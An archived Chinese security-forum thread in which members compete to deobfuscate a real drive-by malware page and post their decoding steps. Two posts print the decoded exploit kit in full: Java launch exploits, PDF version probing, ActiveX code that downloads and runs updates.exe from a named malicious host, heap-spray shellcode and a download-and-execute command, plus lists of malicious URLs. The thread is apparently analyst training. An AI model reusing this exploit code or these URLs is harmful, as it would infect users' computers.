瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 网马解密悬赏第五十二期(已结束)
networkedition - 2010-8-12 12:43:00


引用:
解密地址:http://stsdz18.co.cc/x/index.php




引用:
规则:1.一次解完并附解密日志和步骤(包含swf和pdf网马),奖赏10威望,如果部分解出,每步奖赏2威望;
            2. 如地址失效,请下载附件源代码来进行解密。
            3.对于积极参与此活动会员,并多次中奖者,我们可以诚邀加入卡卡反病毒小组

 

引用:
解密工具:
  Freshow(中文版)
  Redoce(中文版)
  Malzilla (汉化版)

     
 

引用:
在线解析站点:
        http://glacierlk.cn/openlab/jm.htm
        http://www.cha88.cn/

   

引用:
注:论坛所有会员均可参加,严禁使用md的自动解密功能


   

引用:
恶意网址来源瑞星全功能安全软件拦截到真实有效的地址


用户系统信息:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)

附件: index.rar
yalicuan - 2010-8-12 13:20:00
好东东,拿来练练:kaka1:
jks_风 - 2010-8-12 15:13:00
我是中午看见这个帖子的,一直解到现在也没解出来了,狂汗。里面用了一个大小写转换的函数,应该有把'A'转换成'a'的一步吧。
一下是分析的代码。分析的晕晕乎乎的:kaka8:

感觉最关键的还是在于这个split,但是具体的如何操作现在还没想到。
现在的思路是靠document.write(str.split("A") + "<br />")转化。
解密成这样的了,但是看后面的代码还有啥for语句判断啥的,可能还得继续解密。额,不知道这样想对不对。

原以为解密成十进制就可以解密了,但是那个for语句命名真的让人眼晕,而且自己没研究过脚本,对于有些地方还是不理解。
一会要装一台机子,一会估计那些牛牛来了,就解出来了。嘿嘿。网吧今天可能重新营业,诶 不爽。
leo108 - 2010-8-12 15:25:00
首先分析网页代码,在第一个<script>里面,用alert函数,将nottingfoundcscs的值输出,是"spilt"。
nottingfound是数组“nn z cccc9 z fromCharCode z eval z window”(用"z"分割)
发现最后一句其实是执行语句
nottingfound_ddVcAItzXWww[nottingfound[3]](nottingfound_YNErlMSGOC);
因为nottingfound[3]是数组nottingfound的第四个元素eval,因此nottingfound_YNErlMSGOC是解密后的代码。
修改代码,在头部添加代码
<textarea id="abc"></textarea>
把最后一句
nottingfound_ddVcAItzXWww[nottingfound[3]](nottingfound_YNErlMSGOC);
修改为
document.getElementById("abc").value=nottingfound_YNErlMSGOC;
运行html,在框中即为解密后的代码。
然后分析解密后的代码,发现有如下几个可疑链接
hxxp://stsdz18.co.cc/x/l.php?s=samba1&
hxxp://stsdz18.co.cc/x/l.php?s=samba2&
hxxp://stsdz18.co.cc/x/l.php?s=m7NEW
hxxp://stsdz18.co.cc/x/l.php?s=ie6_PR
hxxp://stsdz18.co.cc/x/img1.php?s=i1

经查看,均为pe文件,且杀软不报毒,应该是做过免杀
Anges() - 2010-8-12 16:13:00
解密分析
:kaka12: http://www.01aq.com/view.asp?id=101
是昔流芳 - 2010-8-12 16:20:00
我说说我的办法:
截取中间以 A 分隔的代码,将 A 替换为 &# ,进行10进制解密。我使用的是Redoce,使用9>转义符清除(&#,)即可。得到的代码杂乱无章,如果仔细读过下面的代码,就可以知道还要进行Xor运算。在Redoce里很简便,选择1>代码区Xor(逻辑异或)运算(参数),在上面的参数框里填13,进行运算,可以得到正常的代码。


引用:
-va doa="a"; function java_zdt() {            ty {          va u = "http://stsdz18.co.cc/x/l.php?s=samba1& -J-ja -J\\\\85.234.190.10\\public\\photo1.jpg none";            if (window.navigato[doa+"ppName"] == "Micosoft Intenet Exploe") {                ty {                    va o = document.ceateElement("OB"+"JE"+""+"CT");                  o.classid = "cl"+"s"+""+"id:CAF"+""+"EEF"+""+"AC-DE"+""+"C7-00"+"00-00"+""+"00-ABC"+""+"DE"+""+"FFED"+""+"CBA";                    o["l"+""+doa+""+"u"+""+"n"+""+"c"+""+"h"](u);                } catch (e) {  ty {                  va o2 = document.ceateElement("OB"+""+"JE"+""+"CT");                    o2.classid = "cls"+"id:8A"+""+"D9C840-04"+""+"4E-11D1-B3"+""+"E9-008"+"05F"+""+"499"+"D93";                    o2["l"+""+doa+"u"+""+"n"+"c"+""+"h"](u); } catch (e) {java_nop() ; }                }            } else {                va o = document.ceateElement("O"+""+"BJ"+"EC"+""+"T");                va n = document.ceateElement("O"+""+"BJ"+"EC"+""+"T");                o.type = ""+doa+"pplicati"+""+"on/np"+""+"un"+"time-scipt"+""+"able-plu"+""+"gin;de"+"ploy"+""+"me"+""+"ntto"+""+"olkit";                n.type = ""+doa+"pplica"+""+"tion/ja"+""+"va-dep"+""+"lo"+"ym"+""+"ent-too"+""+"lk"+"it";                document.body.appendChild(o);                document.body.appendChild(n);                ty {                    o["l"+""+doa+"u"+""+""+""+"n"+"c"+""+"h"](u);                } catch (e) {ty {                    n["l"+""+doa+"u"+""+""+""+"n"+"c"+""+"h"](u);} catch (e) {java_nop() ; }                }            }        } catch (e) {java_nop() ;        }    }  function java_nop() { ty {            if (window.navigato[doa+"ppName"] == "Micosoft Intenet Exploe") {              va oSpan = document.ceateElement("span");document.body.appendChild(oSpan);oSpan.inneHTML = '';            } else {              va o = document.ceateElement("OBJECT");                    o.setAttibute("type", "application/x-java-applet");o.setAttibute("launchjnlp", "-J-ja -J\\\\85.234.190.10\\public\\photo1.jpg none");o.setAttibute("docbase", "http://stsdz18.co.cc/x/l.php?s=samba2&");document.body.appendChild(o);            }        } catch (e) {        }    }    if(doa=="a") java_zdt();if (window.navigato.javaEnabled()) {document.wite("");}    document.wite("");va Pdf1 = document.ceateElement("OBJECT");Pdf1.setAttibute("classid", "clsid:CA8A9780-280D-11CF-A24D-444553540000");Pdf1.setAttibute("width", 0);Pdf1.setAttibute("height", 0);Pdf1.setAttibute("id", "Pdf1");document.body.appendChild(Pdf1);function SHOWPDF(fn) {        va p = document.ceateElement("ifame");        p.setAttibute("sc", fn);        p.setAttibute("width", 10);        p.setAttibute("height", 10);        p.setAttibute("famebode", "0");        document.body.appendChild(p);    }function PDF() {ty {va lv=Pdf1.GetVesions();va fi=/EScipt=([^,]+),/;va fif=/AcoFom=([^,]+),/;lvf=lv.match(fif)[1].split('.');lv=lv.match(fi)[1].split('.');sv=paseInt(lv[0]);lv=paseInt(lv.join(''));lvf=paseInt(lvf.join(''));if (lv<=900){window.location="img1.php?s=i"+lv;}else{window.location="img1.php?s=i"+lv;SHOWPDF("zzimg.php");}} catch (e) {}}setTimeout(function(){PDF()}, 5000);va w4PuUGKzaAG00ITa='http://stsdz18.co.cc/x/l.php?s=m7NEW';function idI8akiHI2gQWbO3(A99gX1DSqmU4PIS5,T95llpyAyJfiREW8){va xox96H9fSOpchJCd=null;ty{xox96H9fSOpchJCd=A99gX1DSqmU4PIS5.CeateObject(T95llpyAyJfiREW8)}catch(e){}if(!xox96H9fSOpchJCd){ty{xox96H9fSOpchJCd=A99gX1DSqmU4PIS5.CeateObject(T95llpyAyJfiREW8,"")}catch(e){}}if(!xox96H9fSOpchJCd){ty{xox96H9fSOpchJCd=A99gX1DSqmU4PIS5.CeateObject(T95llpyAyJfiREW8,"","")}catch(e){}}if(!xox96H9fSOpchJCd){ty{xox96H9fSOpchJCd=A99gX1DSqmU4PIS5.GetObject("",T95llpyAyJfiREW8)}catch(e){}}if(!xox96H9fSOpchJCd){ty{xox96H9fSOpchJCd=A99gX1DSqmU4PIS5.GetObject(T95llpyAyJfiREW8,"")}catch(e){}}if(!xox96H9fSOpchJCd){ty{xox96H9fSOpchJCd=A99gX1DSqmU4PIS5.GetObject(T95llpyAyJfiREW8)}catch(e){}}etun(xox96H9fSOpchJCd);}function JUlXFToXVVy38N5l(Ieoue2NVosZDB2IC){CMyvBw7AGmsi1OpN="updates.exe";va E2uGJ3wmRmO06am4=Ieoue2NVosZDB2IC.CeateObject("Scipting.FileSystemObject","");va sap=idI8akiHI2gQWbO3(Ieoue2NVosZDB2IC,"Sh"+"e"+"l"+"l.App"+"l"+"ica"+"t"+"i"+"on");va SeIigfDUYmhjozvy=idI8akiHI2gQWbO3(Ieoue2NVosZDB2IC,"ADODB.Steam");va iXaK2PWuqY2DdnO=null;CMyvBw7AGmsi1OpN=E2uGJ3wmRmO06am4.BuildPath(E2uGJ3wmRmO06am4.GetSpecialFolde(2),CMyvBw7AGmsi1OpN);SeIigfDUYmhjozvy.Mode=3;ty{iXaK2PWuqY2DdnO=idI8akiHI2gQWbO3(Ieoue2NVosZDB2IC,"Mic"+"o"+"so"+"ft.XM"+"LH"+"T"+"TP");iXaK2PWuqY2DdnO.open("G"+"ET",w4PuUGKzaAG00ITa,false);}catch(e){ty{iXaK2PWuqY2DdnO=idI8akiHI2gQWbO3(Ieoue2NVosZDB2IC,"MSX"+"M"+"L2.XML"+"HT"+"TP");iXaK2PWuqY2DdnO.open("GE"+"T",w4PuUGKzaAG00ITa,false);}catch(e){ty{iXaK2PWuqY2DdnO=idI8akiHI2gQWbO3(Ieoue2NVosZDB2IC,"M"+"SX"+"ML2.Se"+"v"+"eX"+"MLHT"+"TP");iXaK2PWuqY2DdnO.open("GET",w4PuUGKzaAG00ITa,false);}catch(e){ty{iXaK2PWuqY2DdnO=new XMLHttpRequest();iXaK2PWuqY2DdnO.open("GET",w4PuUGKzaAG00ITa,false);}catch(e){etun 0;}}}}SeIigfDUYmhjozvy.Type=1;iXaK2PWuqY2DdnO.send(null);b=iXaK2PWuqY2DdnO.esponseBody;SeIigfDUYmhjozvy.Open();SeIigfDUYmhjozvy.Wite(b);SeIigfDUYmhjozvy.SaveTofile(CMyvBw7AGmsi1OpN,2);sap.ShellExecute(CMyvBw7AGmsi1OpN);etun 1;}function iifzkclCP0LVj8Yo(){va PtuYq1i7naonzeB3=0;va iifzkclCP0LVj8Yod=new Aay('BD96C556-65A3-11D0-983A-00C04FC29E36','BD96C556-65A3-11D0-983A-00C04FC29E30','AB9BCEDD-EC7E-47E1-9322-D4A210617116','0006F033-0000-0000-C000-000000000046','0006F03A-0000-0000-C000-000000000046','6e32070a-766d-4ee6-879c-dc1fa91d2fc3','6414512B-B978-451D-A0D8-FCFDF33E833C','7F5B7F63-F06F-4331-8A26-339E03C0AE3D','06723E09-F4C2-43c8-8358-09FCD1DB0766','639F725F-1B2D-4831-A9FD-874847682010','BA018599-1DB3-44f9-83B4-461454C84BF8','D0C07D56-7C69-43F1-B4A0-25F5A11FAB19','E8CCCDDF-CA28-496b-B050-6C07C962476B',null);while(iifzkclCP0LVj8Yod[PtuYq1i7naonzeB3]){va Ieoue2NVosZDB2IC=null;Ieoue2NVosZDB2IC=document.ceateElement("object");Ieoue2NVosZDB2IC.setAttibute("classid","clsid:"+iifzkclCP0LVj8Yod[PtuYq1i7naonzeB3]);if(Ieoue2NVosZDB2IC){ty{va MTky9xTgkAQYALXW=idI8akiHI2gQWbO3(Ieoue2NVosZDB2IC,"S"+"he"+"l"+"l.App"+"lica"+"ti"+"on");if(MTky9xTgkAQYALXW){if(JUlXFToXVVy38N5l(Ieoue2NVosZDB2IC))etun 1;}}catch(e){}}PtuYq1i7naonzeB3++;}}iifzkclCP0LVj8Yo();function MAKEHEAP() {        va qq = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u7374%u7A64%u3831%u632E%u2E6F%u6363%u782F%u6C2F%u702E%u7068%u733F%u693D%u3665%u505F%u0052%u9000");        va me = new Aay;        va z = 548864 - qq.length * 2;        va nu = unescape("%u0c0c%u0c0c");        while (nu.length < z / 2) {            nu += nu;        }        va tu = nu.substing(0, z / 2);        false;        fo (i = 0; i < 270; i++) {            me = tu + tu + qq;        }        va bdy = document.ceateElement("body");        bdy.addBehavio("#default#useData");        document.appendChild(bdy);        ty {            fo (i = 0; i < 10; i++) {                bdy.setAttibute("s", window);            }        } catch (e) {        }        window.status += "";    }    function IEPEERS() {        va gg = document.ceateElement("div");        gg.setAttibute("id", "f");        document.body.appendChild(gg);        document.getElementById("f").inneHTML = "";        document.getElementById("atk").onclick();    }    setTimeout(function(){IEPEERS()}, 9000);document.wite(" exe.js @@ CScipt.exe exe.js //b //s _Micosoft.XMLHTTP_ _GET_ _http://stsdz18.co.cc/x/l.php__s-newhcp_ _false_ _null_ _ADODB.Steam_ 1 3 _exe.exe_ _WScipt.Shell_ 0 @@ del /f /q exe.js @@ taskkill /im /f HelpCt.exe%2522.eplace(/__/g,Sting.fomChaCode(63)).eplace(/@/g,Sting.fomChaCode(38)).eplace(/_/g,Sting.fomChaCode(34)).eplace(/-/g,Sting.fomChaCode(61))%2529%27%29%29%3C/scipt%3E\" width=\"10\" height=\"10\" hspace=\"0\" vspace=\"0\" famebode=\"0\" scolling=\"0\">");


我整理的结果(可能不全)

关于:hxxp://stsdz18.co.cc/x/index.php解密的日志(全体输出 -  11):

Level  0>http://stsdz18.co.cc/x/index.php
Level  1>http://stsdz18.co.cc/x/l.php?s=ie6_PR
Level  1>http://stsdz18.co.cc/x/l.php?s=m7NEW
Level  1>http://stsdz18.co.cc/x/img1.php?s=i900
Level  2>http://stsdz18.co.cc/x/l.php?s=newp_i900&
Level  2>http://stsdz18.co.cc/x/l.php?s=gicon_i900&
Level  2>http://stsdz18.co.cc/x/l.php?s=email_i900&
Level  2>http://stsdz18.co.cc/x/l.php?s=printf_i900&
Level  1>http://stsdz18.co.cc/x/1.zip  ●
Level  1>http://stsdz18.co.cc/x/l.php?s=samba2&
Level  1>http://stsdz18.co.cc/x/l.php?s=samba1&

analyzed by 是昔流芳
鹰丶风少 - 2010-8-12 16:45:00
分析了一下代码,感觉就是在不断的变换,找到关键的语句alert出来后得出了这个,有一个恶意网址。。。
var doa="a";
function java_zdt() {   
        try {
          var u = "http://stsdz18.co.cc/x/l.php?s=samba1& -J-jar -J\\\\85.234.190.10\\public\\photo1.jpg none";
            if (window.navigator[doa+"ppName"] == "Microsoft Internet Explorer") {
                try {
                    var o = document.createElement("OB"+"JE"+""+"CT");
                  o.classid = "cl"+"s"+""+"id:CAF"+""+"EEF"+""+"AC-DE"+""+"C7-00"+"00-00"+""+"00-ABC"+""+"DE"+""+"FFED"+""+"CBA";
                    o["l"+""+doa+""+"u"+""+"n"+""+"c"+""+"h"](u);
                } catch (e) { 
try {
                  var o2 = document.createElement("OB"+""+"JE"+""+"CT");
                    o2.classid = "cls"+"id:8A"+""+"D9C840-04"+""+"4E-11D1-B3"+""+"E9-008"+"05F"+""+"499"+"D93";
                    o2["l"+""+doa+"u"+""+"n"+"c"+""+"h"](u); } catch (e) {java_nop() ; }
                }
            } else {
                var o = document.createElement("O"+""+"BJ"+"EC"+""+"T");
                var n = document.createElement("O"+""+"BJ"+"EC"+""+"T");
                o.type = ""+doa+"pplicati"+""+"on/np"+""+"run"+"time-script"+""+"able-plu"+""+"gin;de"+"ploy"+""+"me"+""+"ntto"+""+"olkit";
                n.type = ""+doa+"pplica"+""+"tion/ja"+""+"va-dep"+""+"lo"+"ym"+""+"ent-too"+""+"lk"+"it";
                document.body.appendChild(o);
                document.body.appendChild(n);
                try {
                    o["l"+""+doa+"u"+""+""+""+"n"+"c"+""+"h"](u);
                } catch (e) {try {

                    n["l"+""+doa+"u"+""+""+""+"n"+"c"+""+"h"](u);
} catch (e) {java_nop() ; }
                }
            }
        } catch (e) {
java_nop() ;
        }
    }

function java_nop() {
try {
            if (window.navigator[doa+"ppName"] == "Microsoft Internet Explorer") {             
var oSpan = document.createElement("span");
        document.body.appendChild(oSpan);
        oSpan.innerHTML = '<object id="" classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93"><PARAM name="launch…
09kaka - 2010-8-12 17:03:00
突破口就是那个eval 豁然开朗
1
查看完整版本: 网马解密悬赏第五十二期(已结束)